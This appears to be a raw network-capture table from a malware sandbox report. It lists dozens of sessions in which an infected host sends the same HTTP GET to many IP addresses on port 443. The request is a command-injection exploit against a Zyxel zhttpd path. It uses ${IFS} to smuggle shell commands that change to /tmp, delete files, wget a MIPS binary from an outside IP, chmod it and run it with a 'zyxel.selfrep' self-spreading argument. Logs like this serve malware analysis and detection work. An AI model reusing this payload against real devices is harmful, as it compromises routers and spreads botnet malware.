                                                        Feb 2, 2024 06:21:20.135494947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6961192.168.2.1456228219.184.135.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135546923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6962192.168.2.1450450204.199.85.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135612011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6963192.168.2.1441474122.110.185.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135638952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6964192.168.2.1454576157.9.253.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135674000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6965192.168.2.1447038142.177.143.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135726929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6966192.168.2.1445712164.186.203.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135786057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6967192.168.2.1439148194.179.210.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135819912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6968192.168.2.1455864114.99.204.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135893106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6969192.168.2.1434586158.253.129.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135907888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6970192.168.2.1450070151.21.96.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135952950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6971192.168.2.1447330154.154.91.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136002064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6972192.168.2.1441504138.119.70.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136029959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6973192.168.2.144969498.42.105.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136056900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6974192.168.2.145386464.218.221.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136094093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6975192.168.2.1441804116.251.164.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136137962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6976192.168.2.1433878197.225.109.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136185884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6977192.168.2.145858268.155.71.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136213064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6978192.168.2.143526497.140.189.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136262894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6979192.168.2.144236825.124.242.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136298895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6980192.168.2.1451690162.234.202.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136343002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6981192.168.2.144305613.110.152.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136373997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6982192.168.2.1438130162.30.132.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136415958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6983192.168.2.1432886192.239.197.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136468887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6984192.168.2.144780645.167.177.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136501074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6985192.168.2.1438664192.156.15.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136532068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6986192.168.2.1448640145.102.160.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136575937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6987192.168.2.1440476211.79.112.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136609077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6988192.168.2.1457350128.196.43.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136657000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6989192.168.2.145371280.210.84.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136712074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6990192.168.2.144873641.116.50.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136746883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6991192.168.2.1436810135.83.122.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136779070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6992192.168.2.1454938121.204.6.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136821032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6993192.168.2.145545062.8.35.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136853933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6994192.168.2.1450026195.235.255.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136909962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6995192.168.2.1458298139.233.199.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136956930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6996192.168.2.144084441.47.254.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.136980057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6997192.168.2.144684699.48.248.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137038946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6998192.168.2.1443874163.137.204.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137092113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6999192.168.2.1460756187.135.213.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137139082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7000192.168.2.144507243.213.36.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137176037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7001192.168.2.1436890222.150.230.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137213945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7002192.168.2.1435828155.154.242.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137273073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7003192.168.2.144816291.206.83.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137305021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7004192.168.2.1439882202.7.132.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137320995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7005192.168.2.145509464.234.223.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137348890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7006192.168.2.1438564102.183.224.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137388945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7007192.168.2.14513885.235.43.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137430906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7008192.168.2.145815078.188.53.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137479067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7009192.168.2.1451122190.64.184.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137517929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7010192.168.2.144209498.209.192.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137556076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7011192.168.2.144500617.12.251.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137588024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7012192.168.2.145897253.250.183.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137644053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7013192.168.2.1456052158.153.72.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137681961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7014192.168.2.143921683.87.181.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137721062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7015192.168.2.144021670.4.101.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137757063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7016192.168.2.145433477.230.183.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137813091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7017192.168.2.144971840.156.230.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137865067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7018192.168.2.1457902211.169.137.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137895107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7019192.168.2.145646831.35.164.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137924910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7020192.168.2.1460420170.89.105.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.137954950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7021192.168.2.145586027.251.177.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138006926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7022192.168.2.1451378222.48.85.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138036966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7023192.168.2.144675066.205.87.197443
                                                        TimestampBytes transferredDirectionData
